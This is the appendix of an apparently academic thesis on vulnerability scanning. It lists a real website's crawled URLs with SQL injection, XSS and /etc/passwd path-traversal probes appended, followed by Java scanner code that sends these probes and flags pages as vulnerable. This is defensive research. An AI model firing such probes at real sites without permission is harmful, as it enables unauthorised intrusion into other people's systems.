Detecting Security Vulnerabilities in Web Applications by Applying Data Validation Testing

  

APPENDIX A: Tables

Table 4.7 Crawling results for sample 1

No.  Website URL
1  http://www.raahauges.com/index.php
2  http://www.raahauges.com/supporters.php
3  http://www.raahauges.com/shotgun-range.php
4  http://www.raahauges.com/hunting.php
5  http://www.raahauges.com/sports-fair.php
6  http://www.raahauges.com/events-calendar.php
7  http://www.raahauges.com/contact.php
8  http://www.raahauges.com/news.php
9  http://www.raahauges.com/shoot-results.php
10  http://www.raahauges.com/find-raahauges.php
11  http://www.raahauges.com/view-news.php?id=9
12  http://www.raahauges.com/view-news.php?id=8
13  http://www.raahauges.com/view-news.php?id=10
14  http://www.raahauges.com/SportsFairFlyer2014.pdf
15  http://www.raahauges.com/index.php?prm=09&chm=-1#mini-calendar
16  http://www.raahauges.com/index.php?prm=09&chm=1#mini-calendar
17  http://www.raahauges.com/events-calendar.php?d=2014-09-13
18  http://www.raahauges.com/events-calendar.php?d=2014-09-14
19  http://www.raahauges.com/events-calendar.php?d=2014-09-17
20  http://www.raahauges.com/events-calendar.php?d=2014-09-18
21  http://www.raahauges.com/events-calendar.php?d=2014-09-19
22  http://www.raahauges.com/events-calendar.php?d=2014-09-20
23  http://www.raahauges.com/events-calendar.php?d=2014-09-21
24  http://www.raahauges.com/events-calendar.php?d=2014-09-28

Table 4.8 Results of the SQL Injection attack scenario for sample 1

No.  Manipulated website URL
1  http://www.raahauges.com/index.php%27
2  http://www.raahauges.com/supporters.php%27
3  http://www.raahauges.com/shotgun-range.php%27
4  http://www.raahauges.com/hunting.php%27
5  http://www.raahauges.com/sports-fair.php%27
6  http://www.raahauges.com/events-calendar.php%27
7  http://www.raahauges.com/contact.php%27
8  http://www.raahauges.com/news.php%27
9  http://www.raahauges.com/shoot-results.php%27
10  http://www.raahauges.com/find-raahauges.php%27
11  http://www.raahauges.com/view-news.php?id=9%27
12  http://www.raahauges.com/view-news.php?id=8%27
13  http://www.raahauges.com/view-news.php?id=10%27
14  http://www.raahauges.com/SportsFairFlyer2014.pdf%27
15  http://www.raahauges.com/index.php?prm=09&chm=-1#mini-calendar%27
16  http://www.raahauges.com/index.php?prm=09&chm=1#mini-calendar%27
17  http://www.raahauges.com/events-calendar.php?d=2014-09-13%27
18  http://www.raahauges.com/events-calendar.php?d=2014-09-14%27
19  http://www.raahauges.com/events-calendar.php?d=2014-09-17%27
20  http://www.raahauges.com/events-calendar.php?d=2014-09-18%27
21  http://www.raahauges.com/events-calendar.php?d=2014-09-19%27
22  http://www.raahauges.com/events-calendar.php?d=2014-09-20%27
23  http://www.raahauges.com/events-calendar.php?d=2014-09-21%27
24  http://www.raahauges.com/events-calendar.php?d=2014-09-28%27

Table 4.9 Results of the Cross Site Scripting attack scenario for sample 1

No.  Manipulated website URL
1  http://www.raahauges.com/index.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
2  http://www.raahauges.com/supporters.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
3  http://www.raahauges.com/shotgun-range.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
4  http://www.raahauges.com/hunting.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
5  http://www.raahauges.com/sports-fair.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
6  http://www.raahauges.com/events-calendar.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
7  http://www.raahauges.com/contact.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
8  http://www.raahauges.com/news.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
9  http://www.raahauges.com/shoot-results.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
10  http://www.raahauges.com/find-raahauges.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
11  http://www.raahauges.com/view-news.php?id=9%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
12  http://www.raahauges.com/view-news.php?id=8%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
13  http://www.raahauges.com/view-news.php?id=10%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
14  http://www.raahauges.com/SportsFairFlyer2014.pdf%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
15  http://www.raahauges.com/index.php?prm=09&chm=-1#mini-calendar%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
16  http://www.raahauges.com/index.php?prm=09&chm=1#mini-calendar%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
17  http://www.raahauges.com/events-calendar.php?d=2014-09-13%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
18  http://www.raahauges.com/events-calendar.php?d=2014-09-14%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
19  http://www.raahauges.com/events-calendar.php?d=2014-09-17%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
20  http://www.raahauges.com/events-calendar.php?d=2014-09-18%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
21  http://www.raahauges.com/events-calendar.php?d=2014-09-19%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
22  http://www.raahauges.com/events-calendar.php?d=2014-09-20%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
23  http://www.raahauges.com/events-calendar.php?d=2014-09-21%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
24  http://www.raahauges.com/events-calendar.php?d=2014-09-28%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E

Table 4.10 Results of the File Inclusion attack scenario for sample 1

No.  Manipulated website URL
1  http://www.raahauges.com/index.php../../../../../../../../../../etc/passwd
2  http://www.raahauges.com/supporters.php../../../../../../../../../../etc/passwd
3  http://www.raahauges.com/shotgun-range.php../../../../../../../../../../etc/passwd
4  http://www.raahauges.com/hunting.php../../../../../../../../../../etc/passwd
5  http://www.raahauges.com/sports-fair.php../../../../../../../../../../etc/passwd
6  http://www.raahauges.com/events-calendar.php../../../../../../../../../../etc/passwd
7  http://www.raahauges.com/contact.php../../../../../../../../../../etc/passwd
8  http://www.raahauges.com/news.php../../../../../../../../../../etc/passwd
9  http://www.raahauges.com/shoot-results.php../../../../../../../../../../etc/passwd
10  http://www.raahauges.com/find-raahauges.php../../../../../../../../../../etc/passwd
11  http://www.raahauges.com/view-news.php?id=9../../../../../../../../../../etc/passwd
12  http://www.raahauges.com/view-news.php?id=8../../../../../../../../../../etc/passwd
13  http://www.raahauges.com/view-news.php?id=10
14  http://www.raahauges.com/SportsFairFlyer2014.pdf../../../../../../../../../../etc/passwd
15  http://www.raahauges.com/index.php?prm=09&chm=-1#mini-calendar../../../../../../../../../../etc/passwd
16  http://www.raahauges.com/index.php?prm=09&chm=1#mini-calendar../../../../../../../../../../etc/passwd
17  http://www.raahauges.com/events-calendar.php?d=2014-09-13../../../../../../../../../../etc/passwd
18  http://www.raahauges.com/events-calendar.php?d=2014-09-14../../../../../../../../../../etc/passwd
19  http://www.raahauges.com/events-calendar.php?d=2014-09-17../../../../../../../../../../etc/passwd
20  http://www.raahauges.com/events-calendar.php?d=2014-09-18../../../../../../../../../../etc/passwd
21  http://www.raahauges.com/events-calendar.php?d=2014-09-19../../../../../../../../../../etc/passwd
22  http://www.raahauges.com/events-calendar.php?d=2014-09-20../../../../../../../../../../etc/passwd
23  http://www.raahauges.com/events-calendar.php?d=2014-09-21../../../../../../../../../../etc/passwd
24  http://www.raahauges.com/events-calendar.php?d=2014-09-28../../../../../../../../../../etc/passwd

  

APPENDIX B: Application Source Code Excerpts

1. AutoScanner SQLi.java

    import java.io.IOException;
    import java.net.URL;
    import java.util.ArrayList;
    import java.util.logging.Level;
    import java.util.logging.Logger;
    import java.util.regex.Matcher;
    import java.util.regex.Pattern;
    import javax.swing.JOptionPane;
    import org.jsoup.Jsoup;
    import org.jsoup.nodes.Document;
    import org.jsoup.nodes.Element;
    import org.jsoup.select.Elements;

    // Excerpt: initComponents(), verifyUrl(), the Swing fields (url_Site, tipeSerangan,
    // hasilScanSQLi) and the read_byPassHttpError class are not shown here.
    public class AutoScannerSQLI extends javax.swing.JFrame {
        private String save[] = new String[250];
        private String testBasic = "";
        private String testBlind = "";
        private String testBlind2 = "";
        // Used by the blind-injection checks below; the declarations are missing from the excerpt.
        private String hasilIdentifikasiTrue = "";
        private String hasilIdentifikasiFalse = "";
        private int hasilPencarian = 0;
        private String inputURL = "";
        ArrayList<String> listOfReportsVulnerable = new ArrayList<String>();
        ArrayList<String> listOfReports = new ArrayList<String>();
        read_byPassHttpError identifikasi = new read_byPassHttpError(null);

        public AutoScannerSQLI() {
            initComponents();
        }

        private void ScanActionPerformed(java.awt.event.ActionEvent evt) {
            hasilScanSQLi.setText("");
            hasilPencarian = 0;
            for (int i = 0; i <= save.length - 1; i++) {
                save[i] = null;
            }
            listOfReportsVulnerable = new ArrayList<String>(0);
            listOfReports = new ArrayList<String>(0);
            inputURL = url_Site.getText();
            String typeAttack = tipeSerangan.getSelectedItem().toString();
            // Check that the URL is well formed
            if ((verifyUrl(inputURL) != null) && (typeAttack != null)) {
                JOptionPane.showMessageDialog(null, "Scan Mulai");
                hasilScanSQLi.append("Situs yang di scan " + inputURL + " \n");
                hasilScanSQLi.append("Jenis Serangan SQL Injection \n" + "tipe serangan : " + typeAttack + "\n");
                listOfReportsVulnerable.add("Tipe serangan : " + typeAttack + "\n");
            } else {
                JOptionPane.showMessageDialog(null, "The entered URL is not valid. Please enter again:");
                url_Site.requestFocus();
                return; // do not crawl or test an invalid URL
            }
            // Start the penetration-testing phase
            websiteCrawler(inputURL);
            if (typeAttack.equals("Basic Injection")) {
                attackScenarioBasic("%27");
            } else if (typeAttack.equals("Blind Injection")) {
                // True attack
                attackScenarioBlindTrue();
                // False attack
                // attackScenarioBlindFalse("%20and%201=0--");
            }
        }

        public void websiteCrawler(String url) {
            Document doc;
            try {
                // need http protocol
                doc = Jsoup.connect(url).timeout(5000)
                        .ignoreHttpErrors(true).followRedirects(true).userAgent("Mozilla").get();
                // get page title
                String title = doc.title();
                // get all links that belong to the scanned site
                Elements links = doc.select("a[href]");
                int i = 0;
                for (Element link : links) {
                    // the bound check keeps a page with more than 250 links from overflowing save[]
                    if (i < save.length && link.attr("abs:href").contains(url)) {
                        save[i] = link.attr("abs:href");
                        i++;
                    }
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
        }

        private void attackScenarioBasic(String serangan) {
            for (int i = 0; i < save.length; i++) {
                if (save[i] != null) {
                    testBasic = save[i] + serangan;
                    readResponAttack(testBasic);
                } else {
                    break;
                }
            }
        }

        // Blind SQL injection attack scenario: compare the responses to a true and a false condition
        private void attackScenarioBlindTrue() {
            String serangan1 = "%20and%201=1--";
            String serangan2 = "%20and%201=0--";
            int size1 = 0, size2 = 0;
            for (int i = 0; i < save.length; i++) {
                if (save[i] != null) {
                    testBlind = save[i] + serangan1;
                    identifikasi.byPassError(testBlind);
                    hasilIdentifikasiTrue = identifikasi.hasilRead;
                    size1 = identifikasi.size;
                    testBlind2 = save[i] + serangan2;
                    identifikasi.byPassError(testBlind2);
                    hasilIdentifikasiFalse = identifikasi.hasilRead;
                    size2 = identifikasi.size;
                    if ((hasilIdentifikasiTrue.equals(hasilIdentifikasiFalse)) || (size1 == size2)) {
                        hasilScanSQLi.append(save[i] + " => " + "Tidak Vulnerable\n");
                        listOfReportsVulnerable.add(save[i] + " => " + "Tidak Vulnerable\n");
                    } else {
                        hasilScanSQLi.append(save[i] + " => " + " Vulnerable\n");
                        listOfReportsVulnerable.add(save[i] + " => " + "Vulnerable");
                        hasilPencarian += 1;
                        listOfReports.add(save[i] + " => " + "Vulnerable");
                    }
                } else {
                    break;
                }
            }
        }

        private void attackScenarioBlindFalse(String serangan) {
            for (int i = 0; i < save.length; i++) {
                if (save[i] != null) {
                    testBlind = save[i] + serangan;
                    try {
                        identifikasi.byPassError(testBlind);
                        // store the false-condition response before comparing it
                        hasilIdentifikasiFalse = identifikasi.hasilRead;
                        if (hasilIdentifikasiTrue.equals(hasilIdentifikasiFalse)) {
                            hasilScanSQLi.append(testBlind + " => " + "Tidak Vulnerable\n");
                        } else {
                            hasilScanSQLi.append(testBlind + " => " + " Vulnerable\n");
                        }
                    } catch (Exception ex) {
                        Logger.getLogger(AutoScannerSQLI.class.getName()).log(Level.SEVERE, null, ex);
                    }
                } else {
                    break;
                }
            }
        }

        // Fingerprinting function: reads the database server back-end response.
        // Analyses the response to decide whether the URL is vulnerable or not.
        private void readResponAttack(String SQLTest) {
            Document doc;
            try {
                // need http protocol
                doc = Jsoup.connect(SQLTest).timeout(3000)
                        .ignoreHttpErrors(true).followRedirects(true)
                        .userAgent("Mozilla").get();
                // get page title
                String title = doc.title();
                System.out.println("title : " + title);
                Elements links = doc.select("a[href]");
                System.out.println("\nlink : " + links.attr("abs:href"));
                String isi = doc.body().text();
                // a database error message in the page body marks the URL as vulnerable
                Pattern p = Pattern.compile("error SQL|You have an error in your SQL syntax");
                Matcher m = p.matcher(isi);
                if (m.find()) {
                    hasilScanSQLi.append(SQLTest + " => " + "Vulnerable\n");
                    listOfReportsVulnerable.add(SQLTest + " => " + "Vulnerable\n");
                    listOfReports.add(SQLTest + " => " + "Vulnerable\n");
                    hasilPencarian += 1;
                } else {
                    hasilScanSQLi.append(SQLTest + " => " + "Tidak Vulnerable\n");
                    listOfReportsVulnerable.add(SQLTest + " => " + "Tidak Vulnerable\n");
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }

2. AutoScannerXSS.java

    import java.io.IOException;
    import java.net.URL;
    import java.util.ArrayList;
    import java.util.logging.Level;
    import java.util.logging.Logger;
    import java.util.regex.Matcher;
    import java.util.regex.Pattern;
    import javax.swing.JOptionPane;
    import org.jsoup.Jsoup;
    import org.jsoup.nodes.Document;

    // Excerpt: initComponents(), verifyUrl(), websiteCrawler(), byPassError() and the Swing
    // fields (urlXSS, tipeXSS, hasilXSS) are not shown here.
    public class AutoScannerXSS extends javax.swing.JFrame {
        private String listUrlXSS[] = new String[250];
        private String hasilRead = "";
        private String tipeAttack = "";
        private int hasilPencarian = 0;
        ArrayList<String> listOfReportsVulnerable = new ArrayList<String>();
        ArrayList<String> listOfReports = new ArrayList<String>();

        public AutoScannerXSS() {
            initComponents();
        }

        private void scanXSSActionPerformed(java.awt.event.ActionEvent evt) {
            String situs = urlXSS.getText();
            tipeAttack = tipeXSS.getSelectedItem().toString();
            hasilXSS.setText(null);
            hasilPencarian = 0;
            listOfReportsVulnerable = new ArrayList<String>(0);
            listOfReports = new ArrayList<String>(0);
            // Reset the list that holds the crawled URLs
            for (int i = 0; i < listUrlXSS.length; i++) {
                listUrlXSS[i] = null;
            }
            if ((verifyUrl(situs) != null) && (tipeAttack != null)) {
                JOptionPane.showMessageDialog(null, "Scan Mulai");
                hasilXSS.append("Situs yang di scan " + situs + " \n");
                hasilXSS.append("Jenis Serangan CRoss Site Scripting \n" + "tipe serangan : " + tipeAttack + "\n");
                // listOfReportsVulnerable.add("Tipe serangan : " + "<!-->" + tipeAttack + " <!-->" + "\n");
                listOfReportsVulnerable.add("List status URL " + "\n");
                // hasilXSS.append(site);
            } else {
                JOptionPane.showMessageDialog(null, "The entered URL is not valid. Please enter again:");
                urlXSS.requestFocus();
                return; // do not crawl or test an invalid URL
            }
            websiteCrawler(situs);
            // Attack phase
            if (tipeAttack.equals("<h1>Testing</h1>")) {
                attackScenarioXSS("%20<h1>Testing</h1>");
            } else if (tipeAttack.equals("'><h1>Testing</h1>")) {
                attackScenarioXSS("%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E");
            } else if (tipeAttack.equals("<script>alert(123)</script>")) {
                attackScenarioXSS("%20<script>alert(123)</script>");
            } else if (tipeAttack.equals("'<script>alert(123);</script>")) {
                attackScenarioXSS("%20'<script>alert(123);</script>");
            }
        }

        private void attackScenarioXSS(String serangan) {
            for (int i = 0; i < listUrlXSS.length; i++) {
                if (listUrlXSS[i] != null) {
                    // String testXSS = listUrlXSS[i] + serangan;
                    // listUrlXSS2[i] = listUrlXSS[i] + serangan;
                    // readResponAttack(testXSS);
                    byPassError(listUrlXSS[i], serangan);
                } else {
                    break;
                }
            }
        }

        private void readResponAttack(String SQLTest) {
            Document doc;
            try {
                // need http protocol
                doc = Jsoup.connect(SQLTest).timeout(5000)
                        .ignoreHttpErrors(true).followRedirects(true)
                        .userAgent("Mozilla").get();
                // get page title
                String title = doc.title();
                System.out.println("title : " + title);
                // Search the markup: text() strips tags, so the injected element could never match there.
                String isi = doc.body().html();
                // Pattern.quote matches the payload literally; "(123)" would otherwise be a regex group.
                Pattern p = Pattern.compile(Pattern.quote(tipeAttack));
                Matcher m = p.matcher(isi);
                if (m.find()) {
                    System.out.println("Match Found \n" + m.group() + "at position " + m.start());
                    hasilXSS.append(" Vulnerable");
                } else {
                    hasilXSS.append("NO Vulnerable");
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }

3. AutoScannerFileInclusion.java

    import java.io.BufferedReader;
    import java.io.IOException;
    import java.io.InputStreamReader;
    import java.net.HttpURLConnection;
    import java.net.URL;
    import java.util.ArrayList;
    import java.util.logging.Level;
    import java.util.logging.Logger;
    import java.util.regex.Matcher;
    import java.util.regex.Pattern;
    import javax.swing.JOptionPane;
    import org.jsoup.Jsoup;
    import org.jsoup.nodes.Document;
    import org.jsoup.nodes.Element;
    import org.jsoup.select.Elements;

    // Excerpt: initComponents(), verifyUrl(), tampil() and the Swing fields
    // (url_Site, tipeSerangan, hasilScan) are not shown here.
    public class AutoScannerFileInclusion extends javax.swing.JFrame {
        private String listUrl[] = new String[250];
        private String inputURL = "";
        private int hasilPencarian = 0;
        ArrayList<String> listOfReportsVulnerable = new ArrayList<String>();
        ArrayList<String> listOfReports = new ArrayList<String>();

        public AutoScannerFileInclusion() {
            initComponents();
        }

        private void ScanActionPerformed(java.awt.event.ActionEvent evt) {
            hasilScan.setText(null);
            // Reset the URL list
            for (int i = 0; i <= listUrl.length - 1; i++) {
                listUrl[i] = null;
            }
            listOfReportsVulnerable = new ArrayList<String>(0);
            listOfReports = new ArrayList<String>(0);
            inputURL = url_Site.getText();
            String serangan = tipeSerangan.getSelectedItem().toString();
            if ((verifyUrl(inputURL) != null) && (serangan != null)) {
                JOptionPane.showMessageDialog(null, "Scan Mulai");
                hasilScan.append("Situs yang di scan " + inputURL + " \n");
                hasilScan.append("Jenis Serangan File Inclusion \n" + "Tipe serangan : " + serangan + "\n");
            } else {
                JOptionPane.showMessageDialog(null, "The entered URL is not valid. Please enter again:");
                url_Site.requestFocus();
                return; // do not crawl or test an invalid URL
            }
            websiteCrawler(inputURL);
            // Attack phase
            if (serangan.equals("File Inclusion")) {
                attackScenarioFileInclusion("../");
                tampil();
            } else if (serangan.equals("File Inclusion with Null")) {
                attackScenarioFileInclusion("../%00");
            }
        }

        public void websiteCrawler(String url) {
            Document doc;
            try {
                // need http protocol
                doc = Jsoup.connect(url).timeout(50000)
                        .ignoreHttpErrors(true).followRedirects(true)
                        .userAgent("Mozilla").get();
                // get page title
                String title = doc.title();
                // System.out.println("title : " + title);
                // get all links that belong to the scanned site
                Elements links = doc.select("a[href]");
                int i = 0;
                for (Element link : links) {
                    // System.out.println("\nlink : " + link.attr("abs:href"));
                    // the bound check keeps a page with more than 250 links from overflowing listUrl[]
                    if (i < listUrl.length && link.attr("abs:href").contains(url)) {
                        listUrl[i] = link.attr("abs:href");
                        i++;
                    }
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
        }

        // Attack scenario (Data Validation Testing)
        private void attackScenarioFileInclusion(String serangan) {
            for (int i = 0; i < listUrl.length; i++) {
                if (listUrl[i] != null) {
                    String testFileInclusion = listUrl[i];
                    byPassError(testFileInclusion, serangan);
                } else {
                    break;
                }
            }
        }

        // Fingerprinting of the back-end response, created by Indra Nababan
        public void byPassError(String url, String serangan) {
            String s = url + serangan;
            BufferedReader in = null;
            try {
                URL obj = new URL(s);
                HttpURLConnection conn = (HttpURLConnection) obj.openConnection();
                conn.setReadTimeout(0);
                conn.setRequestProperty("User-Agent", "Mozilla/5.0 ( compatible ) ");
                conn.setRequestProperty("Accept", "*/*");
                System.out.println("Request URL ... " + s);
                boolean redirect = false;
                // normally, 3xx is redirect
                int status = conn.getResponseCode();
                if (status != HttpURLConnection.HTTP_OK) {
                    if (status == HttpURLConnection.HTTP_MOVED_TEMP
                            || status == HttpURLConnection.HTTP_MOVED_PERM
                            || status == HttpURLConnection.HTTP_SEE_OTHER)
                        redirect = true;
                }
                System.out.println("Response Code ... " + status);
                if (redirect) {
                    // get redirect url from "location" header field
                    String newUrl = conn.getHeaderField("Location");
                    // get the cookie if need, for login
                    String cookies = conn.getHeaderField("Set-Cookie");
                    // open the new connection again
                    conn = (HttpURLConnection) new URL(newUrl).openConnection();
                    if (cookies != null) { // the response may not set a cookie
                        conn.setRequestProperty("Cookie", cookies);
                    }
                    conn.setRequestProperty("User-Agent", "Mozilla/5.0 ( compatible ) ");
                    conn.setRequestProperty("Accept", "*/*");
                    System.out.println("Redirect to URL : " + newUrl);
                }
                boolean isError = conn.getResponseCode() >= 400;
                // The normal input stream doesn't work in error cases.
                if (isError) {
                    in = new BufferedReader(new InputStreamReader(conn.getErrorStream()));
                } else {
                    // read from conn (which follows the redirect) instead of reopening the original URL
                    in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
                }
                String inputLine;
                StringBuffer html = new StringBuffer();
                while ((inputLine = in.readLine()) != null) {
                    html.append(inputLine + "\n");
                }
                in.close();
                String hasil = html.toString();
                // a PHP warning in the response body marks the URL as vulnerable
                Pattern p = Pattern.compile("<b>Warning</b>");
                Matcher m = p.matcher(hasil);
                if (m.find()) {
                    hasilScan.append(s + " => " + "VULNERABLE" + "\n");
                    listOfReportsVulnerable.add(url + " => " + "VULNERABLE" + "\n");
                    listOfReports.add(url + " => " + "VULNERABLE" + "\n");
                    hasilPencarian += 1;
                } else {
                    hasilScan.append(s + " => " + "Not Vulnerable\n");
                    listOfReports.add(url + " => " + "Not VULNERABLE" + "\n");
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }